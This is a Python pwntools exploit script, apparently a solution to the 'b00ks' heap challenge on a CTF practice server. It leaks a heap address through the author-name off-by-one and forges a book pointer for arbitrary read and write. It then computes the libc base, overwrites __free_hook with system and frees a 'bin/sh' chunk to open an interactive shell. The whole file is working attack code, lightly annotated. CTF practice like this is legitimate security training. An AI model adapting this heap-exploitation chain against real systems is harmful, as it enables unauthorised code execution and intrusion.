from pwn import *
from LibcSearcher import *  # star-imported but nothing from it is referenced in this file

# Tube to the remote challenge instance; every helper below talks through it.
p = remote("node5.buuoj.cn", 25494)
# Log every byte sent and received on the tube.
context.log_level = "debug"

# Symbol tables for the libc build shipped with the challenge and the target binary.
# `elf` is loaded but never read again in this script.
libc = ELF('./libc-2.23.so')
elf = ELF('./b00ks')

# Answer to the first prompt: 31 bytes of 'k' (0x1f) followed by one 'b'.
payload = b'k' * 31 + b'b'
p.sendlineafter('Enter author name: ', payload)
def add(size1, content1, size2, content2):
    """Drive menu option 1 (create a book) on the module-level tube ``p``.

    Answers, in order: the book name size, the book name, the description
    size and the description, each sent after its prompt. Sizes are sent
    as decimal strings; contents are passed through unchanged.
    """
    exchange = (
        ('> ', '1'),
        ('Enter book name size:', str(size1)),
        ('Enter book name (Max 32 chars):', content1),
        ('Enter book description size:', str(size2)),
        ('Enter book description:', content2),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)
def edit(idd, content):
    """Drive menu option 3 on ``p``: set the description of book ``idd`` to ``content``.

    The id is sent as a decimal string; ``content`` is passed through unchanged.
    """
    exchange = (
        ('> ', '3'),
        ('Enter the book id you want to edit: ', str(idd)),
        ('Enter new book description: ', content),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)
def show():
    """Select menu option 4 on ``p``; whatever it prints is left for the caller to read."""
    p.sendlineafter('> ', '4')


def free(idd):
    """Drive menu option 2 on ``p``: delete book ``idd`` (sent as a decimal string)."""
    exchange = (
        ('> ', '2'),
        ('Enter the book id you want to delete: ', str(idd)),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)
def ren(content):
    """Drive menu option 5 on ``p``: submit ``content`` as the new author name."""
    exchange = (
        ('> ', '5'),
        ('Enter author name: ', content),
    )
    for prompt, reply in exchange:
        p.sendlineafter(prompt, reply)
# First book: name size 0xd0 / 'aaaaaaaa', description size 0x20 / 'bbbbbbb'.
add(0xd0, 'aaaaaaaa', 0x20, 'bbbbbbb')
# List the books, skip up to "kb", then take the next 6 bytes zero-padded to 8
# and decode them little-endian; the result is kept as heap_addr.
# NOTE(review): recv(6) returns *up to* 6 bytes, not exactly 6; a short read
# would be padded and decoded silently into a wrong value.
show()
p.recvuntil("kb")
heap_addr = u64(p.recv(6)[-6:].ljust(8, b'\x00'))
print('addr' + hex(heap_addr))
# Two more books (presumably ids 2 and 3 in creation order — confirm against the binary).
add(0x80, 'cccccccc', 0x60, 'dddddddd')
add(0x10, 'bin/sh', 0x10, 'ffffffff')
free(2)
# Rewrite book 1's description with four little-endian 8-byte values: 1,
# heap_addr+0x30, heap_addr+0x30+0x90+0xe0+0x10 and 0x20. The constants are
# tied to this particular binary's heap layout.
edit(1, p64(1) + p64(heap_addr + 0x30) + p64(heap_addr + 0x30 + 0x90 + 0xe0 + 0x10) + p64(0x20))
# Author name becomes 32 bytes of 'a', then the listing is shown again.
ren('a' * 0x20)
show()
p.recvuntil('Name: ')
# Read through the first 0x7f byte, zero-pad to 8 bytes and decode little-endian.
# The -88 and -0x10 offsets are hard-coded for the libc build loaded above
# (libc-2.23.so); they will not hold for another libc.
main_addr = u64(p.recvuntil('\x7f').ljust(8, b'\x00')) - 88
malloc_hook = main_addr - 0x10
# Derive the libc load base from the __malloc_hook symbol, then the two
# addresses used below.
base = malloc_hook - libc.sym['__malloc_hook']
free_hook = base + libc.sym['__free_hook']
system = base + libc.sym['system']
print('main_addr' + hex(main_addr))
# Book 1's description now holds free_hook followed by 0x20.
edit(1, p64(free_hook) + p64(0x20))
# Write the computed system address as book 3's description, then delete book 3.
edit(3, p64(system))
free(3)
# `sleep` is provided by pwn's star import.
sleep(1)
# Hand the tube over to the user.
p.interactive()